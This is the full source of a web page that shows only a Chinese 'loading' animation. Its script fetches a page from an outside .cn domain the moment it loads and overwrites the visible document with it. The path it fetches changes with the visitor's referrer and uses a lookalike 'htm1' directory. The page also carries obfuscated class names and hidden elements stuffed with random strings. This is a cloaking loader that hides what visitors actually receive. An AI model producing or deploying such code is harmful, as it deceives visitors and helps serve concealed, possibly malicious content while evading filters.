<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Ko2Ok2Z {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Ko2Ok2Z .i43MsGHPEVc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Ko2Ok2Z .content {
            line-height: 50px;
            text-align: center
        }

        .Ko2Ok2Z .img {
            width: 100%
        }

        .Ko2Ok2Z .xM1Hz6ax {
            text-align: center
        }

        .Ko2Ok2Z .xM1Hz6ax span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Ko2Ok2Z .xM1Hz6ax span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Ko2Ok2Z .xM1Hz6ax span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Ko2Ok2Z .xM1Hz6ax span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Ko2Ok2Z .xM1Hz6ax span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Ko2Ok2Z .xM1Hz6ax span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Ko2Ok2Z .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function nvSeZ3B7L(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var r0gfN = nvSeZ3B7L('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ r0gfN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ r0gfN +".html?a=share";
		}
		
        kJF7EJ9i=url+"#"+new Date().getTime();
        kJF7EJ9i && function() {
            $.get(kJF7EJ9i, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >mXUnx22SRG58Ww6HQlwLFUzFMEf2vD51YQuik1bxbsdPz0AH0bW9GseD</b>
<ul style='display:none' >vxd2HB31BBpZSY2Rzgi0fPNGhcTUDZfa4oGNS6YGF</ul>
<ul style='display:none' >vxd2HB31BBpZSY2Rzgi0fPNGhcTUDZfa4oGNS6YGF</ul>
<p  style='display:none'>i9yc9P2J1PVDTedzxmIEZrGbNS7J9dxDsTd8MvtFyZuXMyJ8sKTz9WDiPasKVo</p>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ayEqbwlzY86rAaNc77Zs9CnOy7vXzN1sBKLOwGEZiZdjk4</a><div class="Ko2Ok2Z">
    <div class="i43MsGHPEVc">
        <div class="xM1Hz6ax">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >NiZrgEPNjRKhpJ0G3CuI9w5JQi9MKAqPx1TCNDwCPPmWeq</ul>
<span style='display:none'>MHyUjGvP48sdcbhn7oQHOxDfoTu9rEtZ3DTbPk0WrauUqzKBysbxdD</span>
<a  href='#' style='display:none'>Zpjt4J8mKJzuWPh2wsJAkjmM3vNRIZ2Qflk99tEeN2ydCLBYj2</a>
<li style='display:none' >Zz6He1n0Sq0ddUW0ukNuvnTKsQ9JMa9XIWLjU6peSbkUw</li>
<span style='display:none'>MHyUjGvP48sdcbhn7oQHOxDfoTu9rEtZ3DTbPk0WrauUqzKBysbxdD</span></body>
</html>